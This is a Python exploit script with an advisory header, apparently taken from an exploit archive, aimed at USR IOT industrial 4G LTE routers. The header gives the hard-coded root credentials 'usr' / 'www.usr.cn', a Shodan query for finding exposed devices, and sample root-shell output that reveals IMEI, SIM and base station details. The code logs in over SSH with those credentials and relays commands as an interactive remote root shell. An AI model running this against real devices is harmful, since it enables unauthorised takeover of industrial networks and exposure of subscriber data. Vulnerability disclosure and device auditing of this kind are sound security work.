## https://sploitus.com/exploit?id=PACKETSTORM:166813
#!/usr/bin/env python3  
#  
#  
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor  
#  
#  
# Vendor: Jinan USR IOT Technology Limited  
# Product web page: https://www.pusr.com | https://www.usriot.com  
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)  
# 1.2.7 (USR-LG220-L)  
#  
# Summary: USR-G806 is an industrial 4G wireless LTE router which provides
# a solution for users to connect their own devices to a 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which  
# can support 580MHz working frequency and can be widely used in Smart Grid,  
# Smart Home, public bus and Vending machine for data transmission at high  
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,  
# flow control and has many advantages including high reliability, simple  
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,  
# WLAN interface, 4G interface. USR-G806 provides various networking mode  
# to help user establish own network.  
#  
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials  
# within its Linux distribution image. These sets of credentials are never  
# exposed to the end-user and cannot be changed through any normal operation  
# of the device. The 'usr' account with password 'www.usr.cn' has the highest  
# privileges on the device. The password is also the default WLAN password.  
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022  
#  
# -------------------------------------------------------------------------  
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14  
#  
# --Got rewt!  
# # id;id root;pwd  
# uid=0(usr) gid=0(usr)  
# uid=2(root) gid=2(root) groups=2(root)  
# /root  
# # crontab -l  
# */2 * * * * /etc/ltedial  
# */20 * * * * /etc/init.d/Net_4G_Check.sh  
# */15 * * * * /etc/test_log.sh  
# */120 * * * * /etc/pddns/pddns_start.sh start &  
# 44 4 * * * /etc/init.d/sysreboot.sh &  
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;  
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;  
# cat /tmp/usrlte_info  
# Local time is Fri Apr 15 05:38:56 2022  
# (loop)  
# IMEI Number:8*************1  
# Operator information:********Telecom  
# signal intensity:normal(20)  
#  
# Software version number:E*****************G  
# SIM Card CIMI number:4*************7  
# SIM Card number:8******************6  
# Short message service center number:"+8**********1"  
# system information:4G Mode  
# PDP protocol:"IPV4V6"  
# CREG:register  
# Check ME password:READY  
# base station information:"4**D","7*****B"  
# cat /tmp/usrlte_info_imsi  
# 4*************7  
# # exit  
#  
# lqwrm@metalgear:~$   
# -------------------------------------------------------------------------  
#  
# Tested on: GNU/Linux 3.10.14 (mips)  
# OpenWrt/Linaro GCC 4.8-2014.04  
# Ralink SoC MT7628 PCIe RC mode  
# BusyBox v1.22.1  
# uhttpd  
# Lua  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2022-5705  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php  
#  
#  
# 10.04.2022  
#  
  
  
import paramiko as bah  
import sys as baaaaaah  
  
bnr='''  
โ–„โ€ข โ–„โ–Œ.โ–„โ–„ ยท โ–„โ–„โ–„ โ–ช โ–„โ–„โ–„โ–„โ–„   
โ–ˆโ–ชโ–ˆโ–ˆโ–Œโ–โ–ˆ โ–€. โ–€โ–„ โ–ˆยทโ–ˆโ–ˆ โ–ช โ€ขโ–ˆโ–ˆ   
โ–ˆโ–Œโ–โ–ˆโ–Œโ–„โ–€โ–€โ–€โ–ˆโ–„โ–โ–€โ–€โ–„ โ–โ–ˆยท โ–„โ–ˆโ–€โ–„ โ–โ–ˆ.โ–ช   
โ–โ–ˆโ–„โ–ˆโ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆโ€ขโ–ˆโ–Œโ–โ–ˆโ–Œโ–โ–ˆโ–Œ.โ–โ–Œ โ–โ–ˆโ–Œยท   
โ–„โ–„โ–„โ–„ยท โ–„โ–„โ–„ยทโ–€ โ–„โ–„ยทโ–€โ–„ โ€ขโ–„ ยทโ–„โ–„โ–„โ–„ โ–€โ–ˆโ–„โ–€โ–ช โ–€โ–€โ–€ โ–„โ–„โ–„   
โ–โ–ˆ โ–€โ–ˆโ–ชโ–โ–ˆ โ–€โ–ˆ โ–โ–ˆ โ–Œโ–ชโ–ˆโ–Œโ–„โ–Œโ–ชโ–ˆโ–ˆโ–ช โ–ˆโ–ˆ โ–ช โ–ช โ–€โ–„ โ–ˆยท  
โ–โ–ˆโ–€โ–€โ–ˆโ–„โ–„โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–ˆ โ–„โ–„โ–โ–€โ–€โ–„ยทโ–โ–ˆยท โ–โ–ˆโ–Œ โ–„โ–ˆโ–€โ–„ โ–„โ–ˆโ–€โ–„ โ–โ–€โ–€โ–„   
โ–ˆโ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆ โ–ชโ–โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆ.โ–ˆโ–Œโ–ˆโ–ˆ. โ–ˆโ–ˆ โ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ€ขโ–ˆโ–Œ  
ยทโ–€โ–€โ–€โ–€ โ–€ โ–€ โ–„โ–„โ–„โ–€ ยทโ–€ โ–€โ–€โ–€โ–€โ–€โ–€โ€ข โ–„โ–„โ–„โ–„โ–„โ–ช โ–€โ–ˆโ–„โ–€โ–ช.โ–€ โ–€  
โ–€โ–„ โ–ˆยทโ–ช โ–ช โ€ขโ–ˆโ–ˆ   
โ–โ–€โ–€โ–„ โ–„โ–ˆโ–€โ–„ โ–„โ–ˆโ–€โ–„ โ–โ–ˆ.โ–ช   
โ–โ–ˆโ€ขโ–ˆโ–Œโ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ–Œ.โ–โ–Œ โ–โ–ˆโ–Œยท   
โ–„โ–„โ–„ยทโ–€ โ–„โ–„ยทโ–€โ–ˆโ–„โ–„ยท โ–„โ–„โ–„โ–€..โ–„โ–„โ–€ยท .โ–„โ–„ ยท   
โ–โ–ˆ โ–€โ–ˆ โ–โ–ˆ โ–Œโ–ชโ–โ–ˆ โ–Œโ–ชโ–€โ–„.โ–€ยทโ–โ–ˆ โ–€. โ–โ–ˆ โ–€.   
โ–„โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–ˆ โ–„โ–„โ–ˆโ–ˆ โ–„โ–„โ–โ–€โ–€โ–ชโ–„โ–„โ–€โ–€โ–€โ–ˆโ–„โ–„โ–€โ–€โ–€โ–ˆโ–„   
โ–โ–ˆ โ–ชโ–โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆโ–„โ–„โ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆโ–„โ–ชโ–โ–ˆ   
โ–€ โ–€ ยทโ–€โ–€โ–€ ยทโ–€โ–€โ–€ โ–€โ–€โ–€ โ–€โ–€โ–€โ–€ โ–€โ–€โ–€โ–€   
'''  
# Print the decorative banner string assigned to `bnr` above; purely cosmetic.
print(bnr)
  
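# Credential check for the hard-coded account described in the advisory header:
# attempt one SSH password login and, if it succeeds, relay typed commands.
#
# Usage guard: the target address is the only argument. sys.exit is used
# instead of the site-provided exit(), which is not guaranteed to exist.
if len(baaaaaah.argv) < 2:
    print('--Gief me an IP.')
    baaaaaah.exit(0)

adrs = baaaaaah.argv[1]
# Per the advisory header, this account is baked into the firmware image and
# cannot be changed through normal operation of the device, so a defender's
# practical control is limiting who can reach the SSH service until a fixed
# firmware is confirmed.
unme = 'usr'
pwrd = 'www.usr.cn'

rsh = bah.SSHClient()
# NOTE(review): AutoAddPolicy accepts whatever host key is presented, so the
# outcome does not prove which host answered at this address.
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    rsh.connect(adrs, username=unme, password=pwrd, port=2222)  # original note: 22 as well
    print('--Got rewt!')
except bah.AuthenticationException:
    # Only a rejected login shows that the hard-coded account is not accepted.
    print('--Backdoor removed.')
    rsh.close()
    baaaaaah.exit(-1)
except Exception as err:
    # Timeouts, refused connections and protocol errors say nothing about the
    # account; reporting them as "removed" would give false assurance.
    print('--Inconclusive, SSH login could not be attempted: %s' % err)
    rsh.close()
    baaaaaah.exit(-1)

try:
    while True:
        cmnd = input('# ')
        if cmnd == 'exit':
            rsh.exec_command('exit')
            break
        # Only stdout of the remote command is shown; stderr is not read.
        stdin, stdout, stderr = rsh.exec_command(cmnd)
        print(stdout.read().decode().strip())
finally:
    # Release the session even if the prompt is interrupted (EOF, Ctrl-C).
    rsh.close()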